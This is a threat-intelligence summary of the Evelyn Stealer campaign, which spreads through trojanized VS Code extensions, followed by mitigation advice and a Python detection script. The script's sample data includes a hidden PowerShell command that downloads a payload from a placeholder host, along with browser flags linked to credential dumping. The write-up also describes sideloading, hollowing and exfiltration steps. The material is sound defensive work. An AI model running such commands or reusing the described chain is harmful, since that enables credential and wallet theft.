The Evelyn Stealer campaign represents a sophisticated, multi-stage information-stealing operation targeting software developers worldwide through weaponized Visual Studio Code extensions. First detected on December 8, 2025, this attack leverages the trusted VS Code extension ecosystem to deliver malicious payloads disguised as legitimate development tools. The Evelyn Stealer malware employs advanced techniques including DLL sideloading, PowerShell execution, and process hollowing to establish persistence and evade detection on Windows systems.
The malware campaign specifically targets developers in the software development and technology industries, capitalizing on implicit trust in development environments. Once embedded, Evelyn Stealer systematically harvests sensitive data including browser credentials, cryptocurrency wallet information, Wi-Fi passwords, clipboard contents, and comprehensive system metadata. The stolen information is packaged into ZIP archives and exfiltrated to attacker-controlled FTP infrastructure, demonstrating a mature and deliberate approach to targeting developer ecosystems.
The Evelyn Stealer attack begins with threat actors distributing weaponized Visual Studio Code extensions that masquerade as legitimate development tools. These malicious extensions abuse the trusted VS Code extension ecosystem, blending seamlessly into developer workflows. The initial payload presents itself as a legitimate Lightshot DLL component, executed alongside the genuine Lightshot.exe executable to maintain credibility and avoid suspicion.
The malicious DLL imitates expected Lightshot behavior while executing hidden payload operations in parallel. To prevent duplicate execution and maintain stealth, the Evelyn malware enforces a singleton model using internal checks and mutex mechanisms. This stage spawns a concealed PowerShell process to download the second-stage payload, saved as “runtime.exe” in the local temporary directory, ensuring seamless transition without alerting the targeted developer.
The second-stage Evelyn Stealer payload functions as a process hollowing injector responsible for deploying the final malware component. This stage decrypts the third-stage payload using AES-256-CBC encryption with predefined keys and initialization vectors. The decrypted payload is then injected into the legitimate Windows process “grpconv.exe” through advanced process hollowing techniques.
Once execution resumes inside the hollowed grpconv.exe process, Evelyn Stealer dynamically resolves the Windows APIs it needs for process injection, file system interaction, registry access, clipboard monitoring, and network communication. These API resolutions are deliberately obfuscated, reflecting a strong focus on evasion and resilience against both manual analysis and the automated security defenses deployed in enterprise environments.
Before initiating large-scale data theft operations, the Evelyn malware conducts extensive environmental checks to confirm it is not operating in virtualized or sandboxed environments. These anti-analysis checks include GPU profiling, hostname validation, disk size inspection, process enumeration, and registry key analysis. Only after determining the environment is trustworthy does Evelyn Stealer create dedicated directory structures within the user’s AppData folder to stage its operations.
The malware prepares for credential harvesting by terminating active browser processes and locating its decryption component, “abe_decrypt.dll,” either locally or by retrieving it from attacker-controlled FTP servers if necessary. This systematic approach demonstrates the campaign’s focus on maintaining operational security throughout the attack lifecycle.
With all components in place, Evelyn Stealer proceeds to harvest browser credentials through DLL injection techniques, capture desktop screenshots, and collect extensive sensitive data. The malware targets system information, clipboard contents, Wi-Fi credentials, and cryptocurrency wallet details, consolidating all stolen data into compressed ZIP archives.
The exfiltration phase transmits stolen information to attacker command-and-control infrastructure over FTP using structured filenames for tracking and organization. This developer-targeted attack illustrates a mature and deliberate approach to supply chain compromise, transforming trusted development tools into effective delivery mechanisms for information theft operations.
Review all installed Visual Studio Code extensions within your development environment and remove any unrecognized or untrusted extensions, particularly those published by unverified developers or with low download counts and no reviews.
Establish an approved list of VS Code extensions for your organization and configure policies to prevent installation of extensions outside that approved list, reducing the risk of trojanized extension installation.
Implement detection rules for the specific file hashes and behavioral indicators associated with this campaign, including monitoring for process injection, suspicious PowerShell execution from VS Code contexts, and FTP traffic to unknown destinations.
Enable comprehensive PowerShell logging, including script block logging and module logging, to detect hidden PowerShell commands used by the malware downloader component.
Monitor and alert on browser processes launched with suspicious command-line arguments such as headless mode, disabled sandbox, or off-screen window positioning that indicate potential credential theft activity.
Apply zero-trust architecture principles specifically to developer workstations and development workflows, treating these as high-value assets with access to production systems and intellectual property.
Separate cryptocurrency wallet access and operations from development systems to prevent credential theft from compromising digital assets.
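As an added illustration of the detection recommendations above (example code, not from the original advisory or from Trend Micro): a small Python classifier run over constructed process-creation records that covers the three stages described, namely a concealed PowerShell launched from the Lightshot/VS Code context that drops runtime.exe into the temp directory, grpconv.exe started by that temp-dir executable, and a browser launched headless, without its sandbox, and positioned off-screen. The -WindowStyle Hidden flag, the browser image names and the C2-PLACEHOLDER host are assumptions, not indicators from the page.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style fields);
# they are illustrative, not telemetry captured from the real campaign.
EVENTS = [
    {"image": r"C:\Program Files\Lightshot\Lightshot.exe",
     "parent": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": "Lightshot.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Lightshot\Lightshot.exe",
     "cmdline": r'powershell.exe -WindowStyle Hidden -c "iwr http://C2-PLACEHOLDER/x -OutFile $env:TEMP\runtime.exe"'},
    {"image": r"C:\Windows\System32\grpconv.exe",
     "parent": r"C:\Users\dev\AppData\Local\Temp\runtime.exe",
     "cmdline": "grpconv.exe"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\System32\grpconv.exe",
     "cmdline": "chrome.exe --headless --no-sandbox --window-position=-32000,-32000"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "chrome.exe --profile-directory=Default"},
]

DEV_TOOL_PARENTS = {"code.exe", "lightshot.exe"}   # VS Code and the abused Lightshot host
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}  # assumed image names
SUSPICIOUS_BROWSER_FLAGS = ("--headless", "--no-sandbox", "--window-position=-")
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\|\\windows\\temp\\|\$env:temp\\")

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the names of the campaign-specific rules an event matches."""
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"].lower()
    hits = []
    # Rule 1 (stage 1): PowerShell spawned by a dev tool, hidden or dropping a temp-dir executable.
    if image in ("powershell.exe", "pwsh.exe") and parent in DEV_TOOL_PARENTS:
        if "hidden" in cmd or "runtime.exe" in cmd or TEMP_DIR.search(cmd):
            hits.append("stage1_hidden_powershell_downloader")
    # Rule 2 (stage 2): grpconv.exe, a rarely used Windows binary, started by a temp-dir executable.
    if image == "grpconv.exe" and TEMP_DIR.search(ev["parent"].lower()):
        hits.append("stage2_grpconv_hollowing_target")
    # Rule 3 (stage 3): a browser started with headless / no-sandbox / off-screen flags.
    if image in BROWSERS and any(flag in cmd for flag in SUSPICIOUS_BROWSER_FLAGS):
        hits.append("browser_credential_dump_args")
    return hits

def scan(events):
    """Map event index -> matched rule names for every event that triggered at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := classify(ev))}
```

Each rule keys on the parent/child relationship rather than on a file hash, so it keeps firing when the dropper is rebuilt; tune the temp-directory and browser lists to your fleet's conventions.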
https://www.trendmicro.com/en_us/research/26/a/analysis-of-the-evelyn-stealercampaign.html